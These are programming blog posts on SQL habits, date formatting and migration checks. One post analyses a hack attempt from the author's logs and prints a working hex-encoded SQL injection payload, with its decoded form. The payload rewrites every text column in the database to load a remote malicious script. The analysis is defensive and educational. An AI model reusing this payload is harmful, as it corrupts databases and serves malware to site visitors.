Chop off their heads

He looked cautiously around, examining every little detail in the room. Each step he took was slow and calculating. His eyes stared at the space above the floor, as if he could see the passing of his quarry through that very space. Raising his right arm, he negligently rested the head of a blood-stained axe upon his shoulder.

He stood still. A drop of blood dripped from the axe for what seemed an eternity, and splattered the floor. He turned, and light glinted off the axe where it wasn’t bloody. A gasp escaped from the closet. He grinned, and shrugged the axe onto both his hands.

He’s cold-hearted. He’s cruel. He’s a murderer.

Axe on chopping block
[image by Geoffery Holman]

No, I’m not writing a horror story. That wasn’t quite scary enough. Although what I’m going to tell you is frightening enough… It was a dark and stormy night… uh…

It was some data patching task. I was to delete some data from a table. I entered the SQL statement

delete from ImportantTable

and promptly executed that statement without providing the where clause!

Oh in the name of all that is good! My heart was pounding like I just finished running a marathon. My hands started sweating. I felt a heat spreading from my neck to my head. “What have I done!”

Luckily, I was using TOAD, a user interface for accessing Oracle databases. And in Oracle, as much as I hate it, any changes to database tables are not committed till you specify it so. There’s a commit button in TOAD. You can also type in “commit” and execute that.

So what I did was roll the changes back, with a handy “rollback” button. Whew…

Like I said before, I prefer any SQL statement I execute to be, you know, really executed. I’ve had experiences where I was debugging my web application and was wondering why the data wasn’t refreshed. The select query using TOAD returned the correct set of data. Why wasn’t the web application doing so too? Because the changes in the database weren’t committed. A waste of 2 hours of my life…

But that’s with Oracle. The other databases aren’t so forgiving. But I like that. Anyway, from then on, I’m very careful about executing update, insert and delete statements.

Still, that wasn’t enough for my paranoid mind, oh no no no. What if I need to have several statements on screen, and a few of them are updates and deletes? Perhaps you would suggest commenting them out. Well, in Query Analyzer (of SQL Server), all you need to do is highlight the statement and you can execute only the highlighted section. If you don’t highlight the commenting syntax (2 dashes or 2 forward slashes), the statement gets executed.

Well, this won’t do at all. So I came up with a fail-safe method; I chopped off the heads of any SQL statement performing “dangerous” operations. So all my “dangerous” statements look like this:

nsert into ImportantTable
values('CODE0001','Very important code')

pdate AnotherImportantTable
set id_desc='An alternative description'
where id_code='IMPT0001'

elete from SuperImportantTable
where price < 500

I add the appropriate header alphabet when I'm going to execute the statement. After execution, I lop the header alphabet again. This leaves the statement still on screen so I know what I did. And in the unfortunate event that I accidentally execute the entire statement when I wasn't supposed to, the execution will fail, because the statement isn't properly formed.

So that's my method of handling SQL statements. When in doubt, chop off their heads first.

Date and time format mistakes in .NET and SQL

I’ve written about how you can manipulate dates and times in .NET before. Here, I’m going to highlight a few avoidable mistakes when manipulating them in .NET and in SQL for database queries.

Case matters

I’m not going to list down all the format strings you can use. Refer to this list instead. You might find this article by Microsoft on best practices useful. I am going to highlight these two letters, h and m.

The small “h” gives you the hour, in 12-hour notation without a leading zero (for less than 10 values). “hh” gives you the 12-hour representation with a leading zero.

The capital “H” gives you the hour in 24-hour notation (or military time) without a leading zero, and “HH” gives you the 24-hour representation with a leading zero.

It’s good user-friendly practice to include the “t” or “tt” notation if you’re using the small “h” to represent the hour (for “A” / “P” or “AM” / “PM” respectively). This way, you know if it’s in the morning or night.

The letter H isn’t so bad. At least you’re still referring to the hour. When you get to M, oh you better watch out.

The small “m” and “mm” gives you the minute (of the time) without and with a leading zero respectively.

The capital “M” and “MM” gives you the month without and with a leading zero respectively. For example, September would be 9 and 09 respectively. See, totally different thing from its small lettered counterpart. There’s the “MMM” and the “MMMM” format string, and I’ll leave it to you to experiment with it.

Now to a common mistake I see: “dd/mm/yyyy“. See any problems?

I’m going to give you a starter custom format string: “dd/MM/yyyy HH:mm:ss“. Burn that into your brain. You can swap “dd” and “MM” if you want. Use “-” instead of “/” as the separator if you want.

The TO_CHAR() function in Oracle PL/SQL

For the equivalent SQL statement to format dates and times in Oracle, here it is:

TO_CHAR(sysdate, 'DD/MM/YYYY HH24:MI:SS')

Note that the function parameter is case insensitive.

Note the difference between “MM” for month and “MI” for minute. For a 12-hour representation, use “HH” or “HH12”.

Tricky formats in Sybase and SQL Server

I don’t know why Sybase and SQL Server don’t just give the ability to easily customise date and time formats. Instead of the string formats in .NET and PL/SQL, they use number codes. Number codes! *urgh*

I actually have a table of the codes and the resulting formats printed out and placed beside my desk, somewhere buried in the chaotic mess of papers. I really just remember 3 number codes: 103, 112 and 120.

select convert(char(10), getdate(), 103)
-- gives something like 17/09/2008 in dd/MM/yyyy format
select convert(char(8), getdate(), 112)
-- gives something like 20080917 in yyyyMMdd format
select convert(char(19), getdate(), 120)
-- gives something like 2008-09-17 05:04:03 in yyyy-MM-dd HH:mm:ss format

I’m using the .NET format string notation in the comments. Note that number code 120 is only available in SQL Server. The other 2 codes are available in both Sybase and SQL Server. There are other codes (which you can explore here). I just frequently use those 3, particularly 112.

If you’re used to the American date display, then this might be useful:

select convert(char(10), getdate(), 101)
-- gives something like 09/17/2008 in MM/dd/yyyy format

Note that you can do something like

select convert(char(6), getdate(), 112)
-- gives something like 200809 in yyyyMM format

Note the char(6) part (versus char(8) originally). I do this quite often too.

Now for the mistake in T-SQL. What do you think is wrong with this?

select convert(char(10), EFF_DATE, 103) EFF_DATE
from Customers
order by EFF_DATE desc

Yes, I’m being deliberately vague. Use your powers of deduction to fill in the blanks.

Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning, long horizontal scrolling ahead. Please click through to post for easier reading):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
int i;
char c;
for (i = 0; i < s.Length; i += 2)
{
    c = Convert.ToChar(Convert.ToInt32(string.Format("0x{0}{1}", s[i], s[i + 1]), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That might not be the best way to manipulate hexadecimal, but you should definitely not follow this example.

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 corresponds to ntext, text, nvarchar, varchar respectively.

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command in executed. Basically, it updates all the text columns in all the user-created tables to a "certain value". Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, so it becomes just one single quote because of the SQL escape. Then it ends with double quotes and a greater than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the lost of data in the text columns, which is probably not as fatal as the Javascript.

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.

Quick and easy data migration check

What is the fastest and easiest way to check if 2 databases contain the same data?

Check that for every table, the number of records is the same in both databases.

Yes, it’s a superficial check. Just because the count is the same in both databases doesn’t mean they contain the same data. But it’s a quick assessment that you’ve done a data migration correctly.

Suppose we have 3 database tables FunLovingDepartments, AwesomeEmployees, and SuperbEmployeeTypes. We could do this:

select count(*) from FunLovingDepartments

and then run it against both databases. Then we do the same for the other 2 tables.

That’s just too tedious. What if we could include the table name and use a union?

select 'FunLovingDepartments', count(*) from FunLovingDepartments
union
select 'AwesomeEmployees', count(*) from AwesomeEmployees
union
select 'SuperbEmployeeTypes', count(*) from SuperbEmployeeTypes

which gives a result something like

'FunLovingDepartment'   3
'AwesomeEmployees'      17
'SuperbEmployeeTypes'   8

Much faster to analyse with everything together. What if you’ve got dozens and dozens of tables? You’re going to get carpal tunnel syndrome from typing all those select statements. Now, what if I told you how you can generate those select statements?

Notice the structure of the select statement you want.

select '{tablename}', count(*) from {tablename} union
select '{tablename}', count(*) from {tablename} union
...
select '{tablename}', count(*) from {tablename} union
select '{tablename}', count(*) from {tablename}

What you do is write the select statement that generates the select statement!

select 'select '''+name+''',count(*) from '+name+' union'
from sysobjects
where type='U'
order by name

There are 2 single quotes to produce 1 single quote because the escape character in a SQL string is the single quote.

This’ll work for SQL Server and Sybase databases. If you’re working with Oracle, no problem.

select 'select '''||TABLE_NAME||''',count(*) from '||TABLE_NAME||' union'
from ALL_TABLES
order by TABLE_NAME

Oracle SQL syntax uses 2 pipe characters for string concatenation.

The above 2 statements will generate the select-union statement that includes every table in your database. All you need is delete the trailing union from the last line. So for our fictional database, the generator SQL will produce this

select 'FunLovingDepartments', count(*) from FunLovingDepartments union
select 'AwesomeEmployees', count(*) from AwesomeEmployees union
select 'SuperbEmployeeTypes', count(*) from SuperbEmployeeTypes union

So just delete the last union keyword and you’re done.

What we have here is a classic case of code generating code. After you run the generated SQL in both databases, you’re going to get 2 sets of results. If you’ve a long list of tables, doing eyeball checks is going to speed up your myopia.

So what you do is run the generator SQL in one database to produce that big chunk of select-union statements. Then run that big chunk of select-union statements to get a set of results. Then copy those results into Excel. Do the same on the other database. What you’ll then have looks something like this in Excel.
Table count comparison in Excel

Columns A and B contain the result set from one database. Columns F and G contain the result set from the other database. Then in column D, you use an Excel formula to do string comparison between the columns. Let me give you the formula for comparing the first row.

=IF(A1=F1,0,99)+IF(B1=G1,0,9999)

What it means is if A1 (table name from database 1) equals to F1 (table name from database 2), then return value 0, otherwise 99. The other part is if B1 (number of records from database 1) equals to G1 (number of records from database 2), then return value 0, otherwise 9999. Then add the two return values. Copy that Excel cell and paste down the line. Excel will automatically make sure the cell rows are correct (A2, A3 and so on).

If the final value is 0, then for that particular table, the number of records is the same in both database. I used 99 and 9999 respectively to distinguish the two different if comparisons. But you can set them to other values, as long as it looks significantly different from 0. Remember, you’ll be scrolling up and down the Excel file (lots of tables), so you don’t want to have your eyes distinguish between for example 8 and 0.

I think the screenshot probably explained it better.

There you have it, a quick and easy data migration check method. This saved me significant amounts of time and effort before. It’s a deadly combination of a SQL statement generating a SQL statement, which in turn generated a result set, which was then copied to Excel for comparison.

Use the existing tools where possible. Not everything needs a custom written program.

P.S. Yay, it’s spring!